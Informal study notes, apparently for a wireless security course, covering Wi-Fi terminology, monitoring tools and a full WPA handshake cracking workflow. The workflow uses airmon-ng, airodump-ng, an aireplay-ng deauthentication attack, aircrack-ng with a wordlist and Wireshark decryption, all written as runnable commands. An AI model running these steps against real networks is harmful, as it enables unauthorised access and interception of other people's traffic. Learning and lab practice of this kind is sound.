You will not be able to do all the stuff on the exam

You will probably be given a wireshark caption and need to interpret it for example.

= Intro =

What you want? You want wireless shit, with access points that are going to the switch

You have a bunch of versions of Wi-Fi, so you just can have different bandwidths and possible frequencies it works with

Access points can also have antennas, and then you will have a different way that actually direct shit

Terminologies! :
* SSID (max 32 bytes)- name of wi-fi network
* BSSID - the MAC address of an access point that has set up an SSID
* AP (access point) - used to access the internet wireless

You can make different types of mapping that are related to showing different wi-fi bullshit on the internet or anywhere. You can just walk around and find out.

You want to also monitor the network! There are multiple tools for that

Such are:
* inSSIDer
* Kismet
* Wireshark

Etc

= Basic Wi-Fi operation =

You can have authentication over the network. That will work like some kind of UDP as it needs some handshakes and etc.

= Connecting an adapter =

When you connect the adapter, connect it to the VM

Then check the interfaces with *ip link* and see there for example *wlan0*

Check that with *iwconfig* as well

Now you want to kill other services and have it in monitor mode

systemctl stop networkmanager (or sudo airmon-ng check kill)

systemctl stop wpa_supplicant

ifconfig wlan0 down

ifconfig wlan0 mode monitor

or you can make your life easier and do:
* sudo airmon-ng check
* sudo airmon-ng check kill
* sudo airmon-ng start wlan0
* sudo airodump-ng wlan0mon

You can limit the monitor to less shit:
* sudo airodump-ng wlan0mon -c 11 --bssid <BSSID>

airodump captures data that is being sent

sudo airodump-ng -c 1 --bssid <BSSID> -w output wlan0mon - you are doing an output

You are waiting for a handshake to start again, but before that, you need somebody to disconnect from the network

You can force that with:
* sudo aireplay-ng --deauth 1 -a <BSSID> -c <BSSID CLIENT> wlan0mon

Then it will tell you that it got a new handshake, in the airodump that is running in parallell

We are interested in .cap files that we got as output.

sudo aircrack-ng -w /usr/share/wordlists/nmap.lst output-01.cap

This will be used to understand what is the key for the networkk.

After that, you can of course go to wireshark, and use that key to decrypt what is going on the network
